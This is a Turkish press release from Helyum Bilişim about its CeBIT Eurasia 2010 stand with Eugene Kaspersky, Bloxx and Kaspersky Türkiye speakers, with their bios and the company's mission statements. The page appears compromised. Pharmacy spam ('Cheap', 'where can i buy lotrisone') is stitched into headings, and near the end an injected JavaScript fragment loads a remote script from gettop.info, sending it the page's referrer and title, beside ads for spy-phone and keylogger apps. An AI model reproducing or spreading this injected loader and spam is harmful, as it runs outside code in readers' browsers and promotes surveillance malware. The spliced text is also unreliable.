Helyum Bilişim CeBIT’de kimler var?

helyum bilişimTeknoloji Güvenliği konusunda uzmanlaşan ve kullanıcılarına yeni güvenlik çözümleri üreten Helyum Bilişim, CeBIT 2010 Eurasia Fuarında Kaspersky Lab Ceo’su Eugene Kaspersky,  Bloxx UK Kanal Müdürü Greg Hewett, Kaspersky Lab Türkiye Genel Müdürü Murat Göçe, Kaspersky Lab Kıdemli Güvenlik Araştırmacısı Stefan Tenesa ile sizleri bir araya getiriyor… IT Güvenlik Yazılımında lider isimlerden olan Kaspersky şirketinin Ceo’su EUGENE KASPERSKY 6 Ekim 2010 tarihinde, CeBIT’de Helyum standında bulunacak. Dünyanın en önde gelen güvenlik çözümlerinin Türkiye Distribütörlüğünü yapan Helyum Bilişim, iş ortaklarını, Kaspersky kullanıcılarını ve ilgilenen herkesi Eugene Kaspersky ile tanışmak ve deniyimlerini paylaşmak için standına davet ediyor. Yeni ürünlerini de tanıtacak olan Helyum Bilişim, 6 Ekim – 10 Ekim 2010 tarihleri arasında, Büyükçekmece Tüyap Kongre merkezinde gerçekleşecek olan CeBIT Bilişim Eurasia fuarında salon 5, B24 standında yerini alıyor.  Kurumlardan son kullanıcılara kadar her türlü müşteri grubunun güvenlik ihtiyaçlarını karşılayacak ürünleri sunan Helyum Bilişim, Kaspersky( İnternet güvenliği), Bloxx (içerik filtreleme), SurGATE (e-posta güvenliği) ve Infowatch (DLP çözümleri) ‘ni fuar süresince, ziyaretçilerine tanıtırken, fuarın ilk gününde 1 saatlik sunumu esnasında ürünleri ile ilgilenenlere detaylı ürün tanıtımlarını gerçekleştirecek.

Eugene Kaspersky Hakkında; Cheap

Eugene Kaspersky, Şifreleme, Telekomünikasyon ve Bilgisayar Bilimi Fakültesi’nden mezun oldu. 1989 yılında bilgisayarına Cascade virüsünün bulaşması üzerine bilgisayar virüsleri konusunda çalışma yapmaya karar verdi. 1991-1997 yılları arasında, bir grup iş arkadaşıyla birlikte AVP antivirüs projesini geliştirdiği KAMI Bilgi Teknolojileri Merkezi’nde çalıştı. Daha sonra AVP’nin adı 2000 yılının Kasım ayında Kaspersky Anti-Virüs olarak değiştirildi. 1997 yılında kurulan Kaspersky Lab’ın kurucu ortaklarından olan Eugene Kaspersky, 2007 yılında Kaspersky Lab’ın CEO’luğuna atandı. Eugene Kaspersky günümüzde bilgi güvenliği alanında sahip olduğu 15 yılı aşkın tecrübesiyle dünyanın önde gelen antivirüs uzmanlarından biri haline geldi. Bu bilgi ve birikimini, dünyanın dört bir yanında, konuşmacı olarak davet edildiği seminer ve konferanslarda düzenli olarak katılımcılara aktarıyor. Kaspersky’nin ayrıca, bilgisayar virüsleriyle ilgili çeşitli makale ve inceleme yazıları da bulunuyor. Helyum Bilişim, Fuarın ilk gününde ayrıca Bloxx İngiltere Kanal Müdürü Greg Hewett’i de standında ağırlayarak, ilgilenen kurum ve kişilerin Hewett’ten bilgi almasını sağlayacak. 6 Ekim saat 16.30 da başlayacak olan Helyum Bilişim Teknoloji Güvenliği sunumu açılış konuşmasını Helyum’dan Sinem Tirkeş yapacak. Tirkeş, genel hatlarıyla Helyum’u ve Helyum’un ürünlerini aktaracak. İçerik filtreleme konusunda lider İngiliz markası Bloxx hakkındaki bilgileri Greg Hewett aktarırken, hemen ardından Kaspersky Lab Türkiye Genel Müdürü Murat Göçe, ülkedeki güvenlik açıklarından söz edecek ve Kaspersky gözüyle sektörü değerlendirecek. Kaspersky Lab Rusya Kıdemli Güvenlik Araştırmacısı Stafen Tanase ise, internet kullanıcılarına yeni tehtidlere karşı korunma konusunda uyarılarda bulunacak.

Sinem Tirkeş, Ürün Satış Yönetmeni – Helyum Bilişim

2010 yılında Ürün Satış Yönetmeni olarak Helyum ailesine katılan Sinem Tirkeş 2004 yıllında Cottey College, USA Bilgisayar Mühendisliği Ön Lisans programını tamamladı. Daha sonra kariyerine Mimar Sinan Güzel Sanatlar Üniversitesi Şehir ve Bölge Planlama’da devam eden Tirkeş 2006-07 yıllarında Valensiya Politeknik Üniversite’sinde aynı eğitimini tamamladı. 2008 yılında aktif iş hayatına Valensiya’da başlayarak stratejik planlama ve proje yönetimi konularında uzmanlaşmış olan Tirkeş, Helyum Bilişim’de güvenlik teknolojileri alanında ürün satış yönetmenliği yapmaktadır.

where can i buy lotrisone Greg Hewett, EMEA Kanal Müdürü – Bloxx UK

Web ve e-mail filtreleme şirketi olan Bloxx’un EMEA Kanal Müdürü olan Greg Hewett, mevcut Bloxx distribütörlerine ve bayilerine stratejik destek verirken, aynı zamanda yeni distribütör ve bayilerin büyüme planlarını sağlamalarına da yardım etmektedir.  IT/Ağ güvenliği pazarında önemli tecrübelere sahip olan Hewett,  11 yılı aşan kanal tecrübesi  ile  bayi ve distribütörlerde de satış yönetim tecrübesi bulunmaktadır. Greg Bloxx’a Westcon Yatırım şirketlerindeki Packeteer hesap yöneticiliği pozisyonundan geçmiştir.

Murat Göçe, Genel Müdür – Kaspersky Lab Türkiye

Murat Göçe 1980 yılından beri Türk bilişim sektöründe çeşitli pozisyonlarda teknik uzman ve yönetici olarak hizmet vermiştir. Bu süreçte kişisel bilgisayarlarlar, sunucu mimarileri ve internetin dünü ve bugününü birebir yaşamış ve bir çok önemli projede uygulamıştır. Yönetici olarak profesyonel yaşamına devam eden Göçe, firmalara proje danışmanlığı, pazar araştırmaları, sistem entegrasyon ve güvenlik çözümleri gibi konularda yardımcı olmuştur. İş deneyimi bir çok yeni yazılımsal ve donanımsal ürünün pazara tanıştırılması, mevcut çözümler ve mimarilerle entegre edilmesi, anahtar teslim projeler olarak üretilmesi ve uygulanmasını kapsar. Göçe, halen bir çok uluslararası ve ulusal firma, organizasyon ve kuruma profesyonel danışmanlık hizmetleri sağlamaktadır.

Stefan Tanase, Kıdemli Güvenlik Araştırmacısı – Kaspersky Lab Rusya

Kaspersky Lab takımına, 2007 yılında Kıdemli Güvenlik Araştırmacısı olarak katılan Stefan Tanase, sahip olduğu çevirimiçi deneyimini bilgi güvenliği alanıyla birleştirerek, internet kullanıcılarının yeni tehditlere karşı korunmasına ve yeni teknolojilerin araştırma ve geliştirmesine etkin olarak katkıda bulunuyor. Tanase, web uygulamaları güvenliği, web tabanlı tehditler ve malware 2.0 konularında uzmandır.

Zararlı yazılım örnekleri veritabanı ya da yeni saldırıları analiz etmede kullanılan sanal sunuculardan, internet uzayını, son tehditleri belirlemek ve bertaraf etmek için sürekli tarayan web tarayıcı gezginlere kadar bir çok yenilikçi araştırma projesinde yer almıştır. Tanase, Küresel Araştırma ve Analiz Takımı’nın bir üyesi olarak, halkı virüsler, bilgisayar korsanları ya da spam konusunda uyarma ve eğitme amacıyla kurulan threatpost.com, viruslist.com ve diğer Kaspersky Lab portallarında güncel bilgi güvenliği konularında analitik makaleler yayınlamaktadır. Bunların dışında Tanase, Virus Bulletin, RSA ya da AVAR gibi dünya çapındaki önemli bilgi güvenliği konferanslarına konuşmacı olarak katılmaktadır

HELYUM BİLİŞİM HAKKINDA

Bilişim sektörünün en eskilerinden olması nedeniyle, ismini Big Bang’den sonra ortaya çıkan ilk elementlerden birinden alan Helyum Bilişim Hizmetleri, 2006 yılının Ekim ayında, çok uzun yıllardan beri sektörde çeşitli pozisyonlarda teknik uzman, satıcı ve yönetici olarak hizmet veren Murat Göçe tarafından İstanbul,  Üsküdar’da küçük bir ofiste doğmuştur. İlk önceleri Veri Kurtarma Hizmetleri ve Kaspersky internet güvenliği ürünlerinin Türkiye’deki dağıtım ve tanıtımını gerçekleştirmek amacıyla kurulmuş olup,  zamanla Rusya Merkezli Kaspersky ürünlerinin yanına internet güvenliği konusunda uzmanlaşarak dağıtım ağına, İngiltere’den Bloxx İçerik Filtreleme, Türkiye’den SurGATE Mail Güvenliği ve yine Rusya’dan Infowatch DLP çözümleri gibi  yeni ürünler kazandırmıştır.
Helyum Bilişim, hizmetleri ve sürekli gelişen ürün yelpazesiyle, küçük orta ya da büyük ölçekli tüm şirketlere özel entegre çözümler sunarak,  gün geçtikçe adını bilişim sektörüne kazıyan bir kuruluş olmanın gururunu yaşamaktadır. Bu paralelde kuruluşundan bu yana sürekli büyümeyi kendine hedef edinen Helyum Bilişim Hizmetleri,  İstanbul’dan sonra Ankara, İzmir ve Trabzon gibi üç büyük şehirde açılan ofisleriyle, dağıtım ağını tüm Türkiye’de güçlendirerek  hiçbir şekilde anlaşmalı teknoloji iş ortakları kanalı ve anlaşmalı mağaza zincirleri dışındaki kurum ve bireylere satış yapmama kararındadır.

2008 yılında Interpro araştırmalarına göre en hızlı büyüyen Bilişim Teknolojisi firması seçilen Helyum, Güvenlik çözümleri sunan firmalar arasında 6., tüm BT firmaları sıralamasında 279. sırada yerine almıştır..  2007 verilerinde 452. olan şirket, 2009 yılı değerlendirmesinde 211. sırada yerini alırken, güvenlik çözümü sunan şirketlerin arasında 4.  sıraya yükselmiştir.. Şirket misyonunu doğal yaşam ve sokak hayvanlarına yardım ile bütünleştiren Helyum’un Strateji, Vizyon ve Misyon tanımları şu şekildedir;

Strateji:  Türkiye, Kuzey Kıbrıs, Ortadoğu ve eski Türk Cumhuriyetlerine Güvenlik ürünleri ve çözümleri sunan, kendi ürettiği Güvenlik ürünlerini de pazarlayarak Bölgenin en önemli,  Türkiye’nin 1 numaralı Güvenlik Teknolojisi sunan Bilişim Firması olmak

Vizyon: Ülkenin her bölgesi ve Kıbrıs’ta şubeler açıp iş imkanı yaratırken, bu coğrafyalardaki tüm noktalara Güvenlik Çözümleri sağlayarak,  en güvenilir ve en bilinen İnternet Güvenliği ürün ve Çözümlerini sağlayan Türkiye’nin 1 numaralı firması olmak.

Misyon: En güçlü ürünleri  oluşturduğu kanal üzerinden en tutarlı ve güvenli şekilde sunarak, konusunda uzmanlaşıp yaratacağı güven sayesinde büyüme ve karlılık sonucunda ülke sıralamasında hızla en üst noktalara çıkarken, daha fazla iş imkanı ve daha fazla sivil toplum kuruluşları ile çalışma imkanı sağlamak,  Böylelikle vatan ekonomisine katkı sağlama bilincinin yanı sıra özellikle Sokak Hayvanlarının yaşadığı zor şartları iyileştirmek adına yardımlarda bulunmak.

Order if (document.currentScript) { s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; Order Cheap spy phone, parent phone monitoring app, android keylogger Purchase

Benzer Yazılar:

  • Benzer yazı bulunamadı.

You must be logged in to post a comment Giris

Linkler

Reklamlar

Giriş - Powered by Pixelim Media · Ukrayna Turlari | Ozge Tur | Tesla ERP